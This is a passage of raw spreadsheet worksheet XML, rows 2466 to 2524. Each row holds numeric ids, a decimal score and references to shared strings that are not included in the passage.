        <v>2464</v>
      </c>
      <c r="B2466">
        <v>1754</v>
      </c>
      <c r="C2466">
        <v>1754</v>
      </c>
      <c r="D2466">
        <v>1</v>
      </c>
      <c r="E2466">
        <v>0.50669997930526733</v>
      </c>
      <c r="F2466" t="s">
        <v>3911</v>
      </c>
      <c r="G2466" t="s">
        <v>4867</v>
      </c>
      <c r="H2466" t="s">
        <v>4868</v>
      </c>
    </row>
    <row r="2467" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2467" s="1">
        <v>2465</v>
      </c>
      <c r="B2467">
        <v>1021</v>
      </c>
      <c r="C2467">
        <v>1021</v>
      </c>
      <c r="D2467">
        <v>1</v>
      </c>
      <c r="E2467">
        <v>0.76150000095367432</v>
      </c>
      <c r="F2467" t="s">
        <v>3911</v>
      </c>
      <c r="G2467" t="s">
        <v>4869</v>
      </c>
      <c r="H2467" t="s">
        <v>4870</v>
      </c>
    </row>
    <row r="2468" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2468" s="1">
        <v>2466</v>
      </c>
      <c r="B2468">
        <v>1769</v>
      </c>
      <c r="C2468">
        <v>1769</v>
      </c>
      <c r="D2468">
        <v>1</v>
      </c>
      <c r="E2468">
        <v>0.77740001678466797</v>
      </c>
      <c r="F2468" t="s">
        <v>3911</v>
      </c>
      <c r="G2468" t="s">
        <v>4871</v>
      </c>
      <c r="H2468" t="s">
        <v>4872</v>
      </c>
    </row>
    <row r="2469" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2469" s="1">
        <v>2467</v>
      </c>
      <c r="B2469">
        <v>1752</v>
      </c>
      <c r="C2469">
        <v>1752</v>
      </c>
      <c r="D2469">
        <v>1</v>
      </c>
      <c r="E2469">
        <v>0.65390002727508545</v>
      </c>
      <c r="F2469" t="s">
        <v>3911</v>
      </c>
      <c r="G2469" t="s">
        <v>4873</v>
      </c>
      <c r="H2469" t="s">
        <v>4874</v>
      </c>
    </row>
    <row r="2470" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2470" s="1">
        <v>2468</v>
      </c>
      <c r="B2470">
        <v>7137</v>
      </c>
      <c r="C2470">
        <v>7137</v>
      </c>
      <c r="D2470">
        <v>1</v>
      </c>
      <c r="E2470">
        <v>0.99919998645782471</v>
      </c>
      <c r="F2470" t="s">
        <v>3911</v>
      </c>
      <c r="G2470" t="s">
        <v>4875</v>
      </c>
      <c r="H2470" t="s">
        <v>4876</v>
      </c>
    </row>
    <row r="2471" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2471" s="1">
        <v>2469</v>
      </c>
      <c r="B2471">
        <v>81</v>
      </c>
      <c r="C2471">
        <v>81</v>
      </c>
      <c r="D2471">
        <v>1</v>
      </c>
      <c r="E2471">
        <v>0.94489997625350952</v>
      </c>
      <c r="F2471" t="s">
        <v>3911</v>
      </c>
      <c r="G2471" t="s">
        <v>4877</v>
      </c>
      <c r="H2471" t="s">
        <v>4878</v>
      </c>
    </row>
    <row r="2472" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2472" s="1">
        <v>2470</v>
      </c>
      <c r="B2472">
        <v>3503</v>
      </c>
      <c r="C2472">
        <v>3503</v>
      </c>
      <c r="D2472">
        <v>1</v>
      </c>
      <c r="E2472">
        <v>0.75360000133514404</v>
      </c>
      <c r="F2472" t="s">
        <v>3911</v>
      </c>
      <c r="G2472" t="s">
        <v>4879</v>
      </c>
      <c r="H2472" t="s">
        <v>4880</v>
      </c>
    </row>
    <row r="2473" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2473" s="1">
        <v>2471</v>
      </c>
      <c r="B2473">
        <v>1743</v>
      </c>
      <c r="C2473">
        <v>1743</v>
      </c>
      <c r="D2473">
        <v>1</v>
      </c>
      <c r="E2473">
        <v>0.82889997959136963</v>
      </c>
      <c r="F2473" t="s">
        <v>3911</v>
      </c>
      <c r="G2473" t="s">
        <v>4881</v>
      </c>
      <c r="H2473" t="s">
        <v>4882</v>
      </c>
    </row>
    <row r="2474" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2474" s="1">
        <v>2472</v>
      </c>
      <c r="B2474">
        <v>1027</v>
      </c>
      <c r="C2474">
        <v>1027</v>
      </c>
      <c r="D2474">
        <v>1</v>
      </c>
      <c r="E2474">
        <v>0.99839997291564941</v>
      </c>
      <c r="F2474" t="s">
        <v>3911</v>
      </c>
      <c r="G2474" t="s">
        <v>4883</v>
      </c>
      <c r="H2474" t="s">
        <v>4884</v>
      </c>
    </row>
    <row r="2475" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2475" s="1">
        <v>2473</v>
      </c>
      <c r="B2475">
        <v>5805</v>
      </c>
      <c r="C2475">
        <v>5805</v>
      </c>
      <c r="D2475">
        <v>1</v>
      </c>
      <c r="E2475">
        <v>0.91949999332427979</v>
      </c>
      <c r="F2475" t="s">
        <v>3911</v>
      </c>
      <c r="G2475" t="s">
        <v>4885</v>
      </c>
      <c r="H2475" t="s">
        <v>4886</v>
      </c>
    </row>
    <row r="2476" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2476" s="1">
        <v>2474</v>
      </c>
      <c r="B2476">
        <v>1023</v>
      </c>
      <c r="C2476">
        <v>1023</v>
      </c>
      <c r="D2476">
        <v>1</v>
      </c>
      <c r="E2476">
        <v>0.98659998178482056</v>
      </c>
      <c r="F2476" t="s">
        <v>3911</v>
      </c>
      <c r="G2476" t="s">
        <v>4887</v>
      </c>
      <c r="H2476" t="s">
        <v>4888</v>
      </c>
    </row>
    <row r="2477" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2477" s="1">
        <v>2475</v>
      </c>
      <c r="B2477">
        <v>977</v>
      </c>
      <c r="C2477">
        <v>977</v>
      </c>
      <c r="D2477">
        <v>1</v>
      </c>
      <c r="E2477">
        <v>0.77289998531341553</v>
      </c>
      <c r="F2477" t="s">
        <v>3911</v>
      </c>
      <c r="G2477" t="s">
        <v>4889</v>
      </c>
      <c r="H2477" t="s">
        <v>4890</v>
      </c>
    </row>
    <row r="2478" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2478" s="1">
        <v>2476</v>
      </c>
      <c r="B2478">
        <v>4647</v>
      </c>
      <c r="C2478">
        <v>4647</v>
      </c>
      <c r="D2478">
        <v>1</v>
      </c>
      <c r="E2478">
        <v>0.67000001668930054</v>
      </c>
      <c r="F2478" t="s">
        <v>3911</v>
      </c>
      <c r="G2478" t="s">
        <v>4891</v>
      </c>
      <c r="H2478" t="s">
        <v>4892</v>
      </c>
    </row>
    <row r="2479" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2479" s="1">
        <v>2477</v>
      </c>
      <c r="B2479">
        <v>5019</v>
      </c>
      <c r="C2479">
        <v>5019</v>
      </c>
      <c r="D2479">
        <v>1</v>
      </c>
      <c r="E2479">
        <v>0.69910001754760742</v>
      </c>
      <c r="F2479" t="s">
        <v>3911</v>
      </c>
      <c r="G2479" t="s">
        <v>4893</v>
      </c>
      <c r="H2479" t="s">
        <v>4894</v>
      </c>
    </row>
    <row r="2480" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2480" s="1">
        <v>2478</v>
      </c>
      <c r="B2480">
        <v>5036</v>
      </c>
      <c r="C2480">
        <v>5036</v>
      </c>
      <c r="D2480">
        <v>1</v>
      </c>
      <c r="E2480">
        <v>0.43230000138282781</v>
      </c>
      <c r="F2480" t="s">
        <v>3911</v>
      </c>
      <c r="G2480" t="s">
        <v>4895</v>
      </c>
      <c r="H2480" t="s">
        <v>4896</v>
      </c>
    </row>
    <row r="2481" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2481" s="1">
        <v>2479</v>
      </c>
      <c r="B2481">
        <v>5940</v>
      </c>
      <c r="C2481">
        <v>5940</v>
      </c>
      <c r="D2481">
        <v>1</v>
      </c>
      <c r="E2481">
        <v>0.51990002393722534</v>
      </c>
      <c r="F2481" t="s">
        <v>3911</v>
      </c>
      <c r="G2481" t="s">
        <v>4897</v>
      </c>
      <c r="H2481" t="s">
        <v>4898</v>
      </c>
    </row>
    <row r="2482" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2482" s="1">
        <v>2480</v>
      </c>
      <c r="B2482">
        <v>1817</v>
      </c>
      <c r="C2482">
        <v>1817</v>
      </c>
      <c r="D2482">
        <v>1</v>
      </c>
      <c r="E2482">
        <v>0.99629998207092285</v>
      </c>
      <c r="F2482" t="s">
        <v>3911</v>
      </c>
      <c r="G2482" t="s">
        <v>4899</v>
      </c>
      <c r="H2482" t="s">
        <v>4900</v>
      </c>
    </row>
    <row r="2483" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2483" s="1">
        <v>2481</v>
      </c>
      <c r="B2483">
        <v>982</v>
      </c>
      <c r="C2483">
        <v>982</v>
      </c>
      <c r="D2483">
        <v>1</v>
      </c>
      <c r="E2483">
        <v>0.55739998817443848</v>
      </c>
      <c r="F2483" t="s">
        <v>3911</v>
      </c>
      <c r="G2483" t="s">
        <v>4901</v>
      </c>
      <c r="H2483" t="s">
        <v>4902</v>
      </c>
    </row>
    <row r="2484" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2484" s="1">
        <v>2482</v>
      </c>
      <c r="B2484">
        <v>1815</v>
      </c>
      <c r="C2484">
        <v>1815</v>
      </c>
      <c r="D2484">
        <v>1</v>
      </c>
      <c r="E2484">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2484" t="s">
        <v>3911</v>
      </c>
      <c r="G2484" t="s">
        <v>4903</v>
      </c>
      <c r="H2484" t="s">
        <v>4904</v>
      </c>
    </row>
    <row r="2485" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2485" s="1">
        <v>2483</v>
      </c>
      <c r="B2485">
        <v>5938</v>
      </c>
      <c r="C2485">
        <v>5938</v>
      </c>
      <c r="D2485">
        <v>1</v>
      </c>
      <c r="E2485">
        <v>0.48100000619888311</v>
      </c>
      <c r="F2485" t="s">
        <v>3911</v>
      </c>
      <c r="G2485" t="s">
        <v>4905</v>
      </c>
      <c r="H2485" t="s">
        <v>4906</v>
      </c>
    </row>
    <row r="2486" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2486" s="1">
        <v>2484</v>
      </c>
      <c r="B2486">
        <v>5018</v>
      </c>
      <c r="C2486">
        <v>5018</v>
      </c>
      <c r="D2486">
        <v>1</v>
      </c>
      <c r="E2486">
        <v>0.54809999465942383</v>
      </c>
      <c r="F2486" t="s">
        <v>3911</v>
      </c>
      <c r="G2486" t="s">
        <v>4907</v>
      </c>
      <c r="H2486" t="s">
        <v>4908</v>
      </c>
    </row>
    <row r="2487" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2487" s="1">
        <v>2485</v>
      </c>
      <c r="B2487">
        <v>4627</v>
      </c>
      <c r="C2487">
        <v>4627</v>
      </c>
      <c r="D2487">
        <v>1</v>
      </c>
      <c r="E2487">
        <v>0.53009998798370361</v>
      </c>
      <c r="F2487" t="s">
        <v>3911</v>
      </c>
      <c r="G2487" t="s">
        <v>4909</v>
      </c>
      <c r="H2487" t="s">
        <v>4910</v>
      </c>
    </row>
    <row r="2488" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2488" s="1">
        <v>2486</v>
      </c>
      <c r="B2488">
        <v>1799</v>
      </c>
      <c r="C2488">
        <v>1799</v>
      </c>
      <c r="D2488">
        <v>1</v>
      </c>
      <c r="E2488">
        <v>0.99849998950958252</v>
      </c>
      <c r="F2488" t="s">
        <v>3911</v>
      </c>
      <c r="G2488" t="s">
        <v>4911</v>
      </c>
      <c r="H2488" t="s">
        <v>4912</v>
      </c>
    </row>
    <row r="2489" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2489" s="1">
        <v>2487</v>
      </c>
      <c r="B2489">
        <v>6424</v>
      </c>
      <c r="C2489">
        <v>6424</v>
      </c>
      <c r="D2489">
        <v>1</v>
      </c>
      <c r="E2489">
        <v>0.70340001583099365</v>
      </c>
      <c r="F2489" t="s">
        <v>3911</v>
      </c>
      <c r="G2489" t="s">
        <v>4913</v>
      </c>
      <c r="H2489" t="s">
        <v>4914</v>
      </c>
    </row>
    <row r="2490" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2490" s="1">
        <v>2488</v>
      </c>
      <c r="B2490">
        <v>7115</v>
      </c>
      <c r="C2490">
        <v>7115</v>
      </c>
      <c r="D2490">
        <v>1</v>
      </c>
      <c r="E2490">
        <v>0.76080000400543213</v>
      </c>
      <c r="F2490" t="s">
        <v>3911</v>
      </c>
      <c r="G2490" t="s">
        <v>4915</v>
      </c>
      <c r="H2490" t="s">
        <v>4916</v>
      </c>
    </row>
    <row r="2491" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2491" s="1">
        <v>2489</v>
      </c>
      <c r="B2491">
        <v>7116</v>
      </c>
      <c r="C2491">
        <v>7116</v>
      </c>
      <c r="D2491">
        <v>1</v>
      </c>
      <c r="E2491">
        <v>0.98600000143051147</v>
      </c>
      <c r="F2491" t="s">
        <v>3911</v>
      </c>
      <c r="G2491" t="s">
        <v>4917</v>
      </c>
      <c r="H2491" t="s">
        <v>4918</v>
      </c>
    </row>
    <row r="2492" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2492" s="1">
        <v>2490</v>
      </c>
      <c r="B2492">
        <v>89</v>
      </c>
      <c r="C2492">
        <v>89</v>
      </c>
      <c r="D2492">
        <v>1</v>
      </c>
      <c r="E2492">
        <v>0.99860000610351563</v>
      </c>
      <c r="F2492" t="s">
        <v>3911</v>
      </c>
      <c r="G2492" t="s">
        <v>4919</v>
      </c>
      <c r="H2492" t="s">
        <v>4920</v>
      </c>
    </row>
    <row r="2493" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2493" s="1">
        <v>2491</v>
      </c>
      <c r="B2493">
        <v>7462</v>
      </c>
      <c r="C2493">
        <v>7462</v>
      </c>
      <c r="D2493">
        <v>1</v>
      </c>
      <c r="E2493">
        <v>0.77249997854232788</v>
      </c>
      <c r="F2493" t="s">
        <v>3911</v>
      </c>
      <c r="G2493" t="s">
        <v>4921</v>
      </c>
      <c r="H2493" t="s">
        <v>4922</v>
      </c>
    </row>
    <row r="2494" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2494" s="1">
        <v>2492</v>
      </c>
      <c r="B2494">
        <v>99</v>
      </c>
      <c r="C2494">
        <v>99</v>
      </c>
      <c r="D2494">
        <v>1</v>
      </c>
      <c r="E2494">
        <v>0.91130000352859497</v>
      </c>
      <c r="F2494" t="s">
        <v>3911</v>
      </c>
      <c r="G2494" t="s">
        <v>4923</v>
      </c>
      <c r="H2494" t="s">
        <v>4924</v>
      </c>
    </row>
    <row r="2495" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2495" s="1">
        <v>2493</v>
      </c>
      <c r="B2495">
        <v>3548</v>
      </c>
      <c r="C2495">
        <v>3548</v>
      </c>
      <c r="D2495">
        <v>1</v>
      </c>
      <c r="E2495">
        <v>0.44710001349449158</v>
      </c>
      <c r="F2495" t="s">
        <v>3911</v>
      </c>
      <c r="G2495" t="s">
        <v>4925</v>
      </c>
      <c r="H2495" t="s">
        <v>4926</v>
      </c>
    </row>
    <row r="2496" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2496" s="1">
        <v>2494</v>
      </c>
      <c r="B2496">
        <v>7886</v>
      </c>
      <c r="C2496">
        <v>7886</v>
      </c>
      <c r="D2496">
        <v>1</v>
      </c>
      <c r="E2496">
        <v>0.50139999389648438</v>
      </c>
      <c r="F2496" t="s">
        <v>3911</v>
      </c>
      <c r="G2496" t="s">
        <v>4927</v>
      </c>
      <c r="H2496" t="s">
        <v>4928</v>
      </c>
    </row>
    <row r="2497" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2497" s="1">
        <v>2495</v>
      </c>
      <c r="B2497">
        <v>5820</v>
      </c>
      <c r="C2497">
        <v>5820</v>
      </c>
      <c r="D2497">
        <v>1</v>
      </c>
      <c r="E2497">
        <v>0.99699997901916504</v>
      </c>
      <c r="F2497" t="s">
        <v>3911</v>
      </c>
      <c r="G2497" t="s">
        <v>4929</v>
      </c>
      <c r="H2497" t="s">
        <v>4930</v>
      </c>
    </row>
    <row r="2498" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2498" s="1">
        <v>2496</v>
      </c>
      <c r="B2498">
        <v>3621</v>
      </c>
      <c r="C2498">
        <v>3621</v>
      </c>
      <c r="D2498">
        <v>1</v>
      </c>
      <c r="E2498">
        <v>0.44499999284744263</v>
      </c>
      <c r="F2498" t="s">
        <v>3911</v>
      </c>
      <c r="G2498" t="s">
        <v>4931</v>
      </c>
      <c r="H2498" t="s">
        <v>4932</v>
      </c>
    </row>
    <row r="2499" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2499" s="1">
        <v>2497</v>
      </c>
      <c r="B2499">
        <v>1250</v>
      </c>
      <c r="C2499">
        <v>1250</v>
      </c>
      <c r="D2499">
        <v>1</v>
      </c>
      <c r="E2499">
        <v>0.99779999256134033</v>
      </c>
      <c r="F2499" t="s">
        <v>3911</v>
      </c>
      <c r="G2499" t="s">
        <v>4933</v>
      </c>
      <c r="H2499" t="s">
        <v>4934</v>
      </c>
    </row>
    <row r="2500" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2500" s="1">
        <v>2498</v>
      </c>
      <c r="B2500">
        <v>1380</v>
      </c>
      <c r="C2500">
        <v>1380</v>
      </c>
      <c r="D2500">
        <v>1</v>
      </c>
      <c r="E2500">
        <v>0.94270002841949463</v>
      </c>
      <c r="F2500" t="s">
        <v>3911</v>
      </c>
      <c r="G2500" t="s">
        <v>4935</v>
      </c>
      <c r="H2500" t="s">
        <v>4936</v>
      </c>
    </row>
    <row r="2501" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2501" s="1">
        <v>2499</v>
      </c>
      <c r="B2501">
        <v>3622</v>
      </c>
      <c r="C2501">
        <v>3622</v>
      </c>
      <c r="D2501">
        <v>1</v>
      </c>
      <c r="E2501">
        <v>0.97630000114440918</v>
      </c>
      <c r="F2501" t="s">
        <v>3911</v>
      </c>
      <c r="G2501" t="s">
        <v>4937</v>
      </c>
      <c r="H2501" t="s">
        <v>4938</v>
      </c>
    </row>
    <row r="2502" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2502" s="1">
        <v>2500</v>
      </c>
      <c r="B2502">
        <v>1377</v>
      </c>
      <c r="C2502">
        <v>1377</v>
      </c>
      <c r="D2502">
        <v>1</v>
      </c>
      <c r="E2502">
        <v>0.45739999413490301</v>
      </c>
      <c r="F2502" t="s">
        <v>3911</v>
      </c>
      <c r="G2502" t="s">
        <v>4939</v>
      </c>
      <c r="H2502" t="s">
        <v>4940</v>
      </c>
    </row>
    <row r="2503" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2503" s="1">
        <v>2501</v>
      </c>
      <c r="B2503">
        <v>7917</v>
      </c>
      <c r="C2503">
        <v>7917</v>
      </c>
      <c r="D2503">
        <v>1</v>
      </c>
      <c r="E2503">
        <v>0.99779999256134033</v>
      </c>
      <c r="F2503" t="s">
        <v>3911</v>
      </c>
      <c r="G2503" t="s">
        <v>4941</v>
      </c>
      <c r="H2503" t="s">
        <v>4942</v>
      </c>
    </row>
    <row r="2504" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2504" s="1">
        <v>2502</v>
      </c>
      <c r="B2504">
        <v>1384</v>
      </c>
      <c r="C2504">
        <v>1384</v>
      </c>
      <c r="D2504">
        <v>1</v>
      </c>
      <c r="E2504">
        <v>0.99709999561309814</v>
      </c>
      <c r="F2504" t="s">
        <v>3911</v>
      </c>
      <c r="G2504" t="s">
        <v>4943</v>
      </c>
      <c r="H2504" t="s">
        <v>4944</v>
      </c>
    </row>
    <row r="2505" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2505" s="1">
        <v>2503</v>
      </c>
      <c r="B2505">
        <v>4889</v>
      </c>
      <c r="C2505">
        <v>4889</v>
      </c>
      <c r="D2505">
        <v>1</v>
      </c>
      <c r="E2505">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2505" t="s">
        <v>3911</v>
      </c>
      <c r="G2505" t="s">
        <v>4945</v>
      </c>
      <c r="H2505" t="s">
        <v>4946</v>
      </c>
    </row>
    <row r="2506" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2506" s="1">
        <v>2504</v>
      </c>
      <c r="B2506">
        <v>4882</v>
      </c>
      <c r="C2506">
        <v>4882</v>
      </c>
      <c r="D2506">
        <v>1</v>
      </c>
      <c r="E2506">
        <v>0.91159999370574951</v>
      </c>
      <c r="F2506" t="s">
        <v>3911</v>
      </c>
      <c r="G2506" t="s">
        <v>4947</v>
      </c>
      <c r="H2506" t="s">
        <v>4948</v>
      </c>
    </row>
    <row r="2507" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2507" s="1">
        <v>2505</v>
      </c>
      <c r="B2507">
        <v>4815</v>
      </c>
      <c r="C2507">
        <v>4815</v>
      </c>
      <c r="D2507">
        <v>1</v>
      </c>
      <c r="E2507">
        <v>0.81790000200271606</v>
      </c>
      <c r="F2507" t="s">
        <v>3911</v>
      </c>
      <c r="G2507" t="s">
        <v>4949</v>
      </c>
      <c r="H2507" t="s">
        <v>4950</v>
      </c>
    </row>
    <row r="2508" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2508" s="1">
        <v>2506</v>
      </c>
      <c r="B2508">
        <v>3672</v>
      </c>
      <c r="C2508">
        <v>3672</v>
      </c>
      <c r="D2508">
        <v>1</v>
      </c>
      <c r="E2508">
        <v>0.85559999942779541</v>
      </c>
      <c r="F2508" t="s">
        <v>3911</v>
      </c>
      <c r="G2508" t="s">
        <v>4951</v>
      </c>
      <c r="H2508" t="s">
        <v>4952</v>
      </c>
    </row>
    <row r="2509" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2509" s="1">
        <v>2507</v>
      </c>
      <c r="B2509">
        <v>3630</v>
      </c>
      <c r="C2509">
        <v>3630</v>
      </c>
      <c r="D2509">
        <v>1</v>
      </c>
      <c r="E2509">
        <v>0.54500001668930054</v>
      </c>
      <c r="F2509" t="s">
        <v>3911</v>
      </c>
      <c r="G2509" t="s">
        <v>4953</v>
      </c>
      <c r="H2509" t="s">
        <v>4954</v>
      </c>
    </row>
    <row r="2510" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2510" s="1">
        <v>2508</v>
      </c>
      <c r="B2510">
        <v>4822</v>
      </c>
      <c r="C2510">
        <v>4822</v>
      </c>
      <c r="D2510">
        <v>1</v>
      </c>
      <c r="E2510">
        <v>0.80500000715255737</v>
      </c>
      <c r="F2510" t="s">
        <v>3911</v>
      </c>
      <c r="G2510" t="s">
        <v>4955</v>
      </c>
      <c r="H2510" t="s">
        <v>4956</v>
      </c>
    </row>
    <row r="2511" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2511" s="1">
        <v>2509</v>
      </c>
      <c r="B2511">
        <v>5890</v>
      </c>
      <c r="C2511">
        <v>5890</v>
      </c>
      <c r="D2511">
        <v>1</v>
      </c>
      <c r="E2511">
        <v>0.81459999084472656</v>
      </c>
      <c r="F2511" t="s">
        <v>3911</v>
      </c>
      <c r="G2511" t="s">
        <v>4957</v>
      </c>
      <c r="H2511" t="s">
        <v>4958</v>
      </c>
    </row>
    <row r="2512" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2512" s="1">
        <v>2510</v>
      </c>
      <c r="B2512">
        <v>7342</v>
      </c>
      <c r="C2512">
        <v>7342</v>
      </c>
      <c r="D2512">
        <v>1</v>
      </c>
      <c r="E2512">
        <v>0.50999999046325684</v>
      </c>
      <c r="F2512" t="s">
        <v>3911</v>
      </c>
      <c r="G2512" t="s">
        <v>4959</v>
      </c>
      <c r="H2512" t="s">
        <v>4960</v>
      </c>
    </row>
    <row r="2513" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2513" s="1">
        <v>2511</v>
      </c>
      <c r="B2513">
        <v>6356</v>
      </c>
      <c r="C2513">
        <v>6356</v>
      </c>
      <c r="D2513">
        <v>1</v>
      </c>
      <c r="E2513">
        <v>0.99779999256134033</v>
      </c>
      <c r="F2513" t="s">
        <v>3911</v>
      </c>
      <c r="G2513" t="s">
        <v>4961</v>
      </c>
      <c r="H2513" t="s">
        <v>4962</v>
      </c>
    </row>
    <row r="2514" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2514" s="1">
        <v>2512</v>
      </c>
      <c r="B2514">
        <v>1386</v>
      </c>
      <c r="C2514">
        <v>1386</v>
      </c>
      <c r="D2514">
        <v>1</v>
      </c>
      <c r="E2514">
        <v>0.98710000514984131</v>
      </c>
      <c r="F2514" t="s">
        <v>3911</v>
      </c>
      <c r="G2514" t="s">
        <v>4963</v>
      </c>
      <c r="H2514" t="s">
        <v>4964</v>
      </c>
    </row>
    <row r="2515" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2515" s="1">
        <v>2513</v>
      </c>
      <c r="B2515">
        <v>1388</v>
      </c>
      <c r="C2515">
        <v>1388</v>
      </c>
      <c r="D2515">
        <v>1</v>
      </c>
      <c r="E2515">
        <v>0.99930000305175781</v>
      </c>
      <c r="F2515" t="s">
        <v>3911</v>
      </c>
      <c r="G2515" t="s">
        <v>4965</v>
      </c>
      <c r="H2515" t="s">
        <v>4966</v>
      </c>
    </row>
    <row r="2516" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2516" s="1">
        <v>2514</v>
      </c>
      <c r="B2516">
        <v>1431</v>
      </c>
      <c r="C2516">
        <v>1431</v>
      </c>
      <c r="D2516">
        <v>1</v>
      </c>
      <c r="E2516">
        <v>0.81559997797012329</v>
      </c>
      <c r="F2516" t="s">
        <v>3911</v>
      </c>
      <c r="G2516" t="s">
        <v>4967</v>
      </c>
      <c r="H2516" t="s">
        <v>4968</v>
      </c>
    </row>
    <row r="2517" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2517" s="1">
        <v>2515</v>
      </c>
      <c r="B2517">
        <v>1430</v>
      </c>
      <c r="C2517">
        <v>1430</v>
      </c>
      <c r="D2517">
        <v>1</v>
      </c>
      <c r="E2517">
        <v>0.99900001287460327</v>
      </c>
      <c r="F2517" t="s">
        <v>3911</v>
      </c>
      <c r="G2517" t="s">
        <v>4969</v>
      </c>
      <c r="H2517" t="s">
        <v>4970</v>
      </c>
    </row>
    <row r="2518" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2518" s="1">
        <v>2516</v>
      </c>
      <c r="B2518">
        <v>6353</v>
      </c>
      <c r="C2518">
        <v>6353</v>
      </c>
      <c r="D2518">
        <v>1</v>
      </c>
      <c r="E2518">
        <v>0.80889999866485596</v>
      </c>
      <c r="F2518" t="s">
        <v>3911</v>
      </c>
      <c r="G2518" t="s">
        <v>4971</v>
      </c>
      <c r="H2518" t="s">
        <v>4972</v>
      </c>
    </row>
    <row r="2519" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2519" s="1">
        <v>2517</v>
      </c>
      <c r="B2519">
        <v>32</v>
      </c>
      <c r="C2519">
        <v>32</v>
      </c>
      <c r="D2519">
        <v>1</v>
      </c>
      <c r="E2519">
        <v>0.47850000858306879</v>
      </c>
      <c r="F2519" t="s">
        <v>3911</v>
      </c>
      <c r="G2519" t="s">
        <v>4973</v>
      </c>
      <c r="H2519" t="s">
        <v>4974</v>
      </c>
    </row>
    <row r="2520" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2520" s="1">
        <v>2518</v>
      </c>
      <c r="B2520">
        <v>5842</v>
      </c>
      <c r="C2520">
        <v>5842</v>
      </c>
      <c r="D2520">
        <v>1</v>
      </c>
      <c r="E2520">
        <v>0.52689999341964722</v>
      </c>
      <c r="F2520" t="s">
        <v>3911</v>
      </c>
      <c r="G2520" t="s">
        <v>4975</v>
      </c>
      <c r="H2520" t="s">
        <v>4976</v>
      </c>
    </row>
    <row r="2521" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2521" s="1">
        <v>2519</v>
      </c>
      <c r="B2521">
        <v>3681</v>
      </c>
      <c r="C2521">
        <v>3681</v>
      </c>
      <c r="D2521">
        <v>1</v>
      </c>
      <c r="E2521">
        <v>0.97530001401901245</v>
      </c>
      <c r="F2521" t="s">
        <v>3911</v>
      </c>
      <c r="G2521" t="s">
        <v>4977</v>
      </c>
      <c r="H2521" t="s">
        <v>4978</v>
      </c>
    </row>
    <row r="2522" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2522" s="1">
        <v>2520</v>
      </c>
      <c r="B2522">
        <v>1387</v>
      </c>
      <c r="C2522">
        <v>1387</v>
      </c>
      <c r="D2522">
        <v>1</v>
      </c>
      <c r="E2522">
        <v>0.89200001955032349</v>
      </c>
      <c r="F2522" t="s">
        <v>3911</v>
      </c>
      <c r="G2522" t="s">
        <v>4979</v>
      </c>
      <c r="H2522" t="s">
        <v>4980</v>
      </c>
    </row>
    <row r="2523" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2523" s="1">
        <v>2521</v>
      </c>
      <c r="B2523">
        <v>5845</v>
      </c>
      <c r="C2523">
        <v>5845</v>
      </c>
      <c r="D2523">
        <v>1</v>
      </c>
      <c r="E2523">
        <v>0.94749999046325684</v>
      </c>
      <c r="F2523" t="s">
        <v>3911</v>
      </c>
      <c r="G2523" t="s">
        <v>4981</v>
      </c>
      <c r="H2523" t="s">
        <v>4982</v>
      </c>
    </row>
    <row r="2524" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2524" s="1">
        <v>2522</v>
      </c>
      <c r="B2524">
        <v>3610</v>
      </c>
      <c r="C2524">
        <v>3610</v>
      </c>
      <c r="D2524">
        <v>1</v>
      </c>
      <c r="E2524">
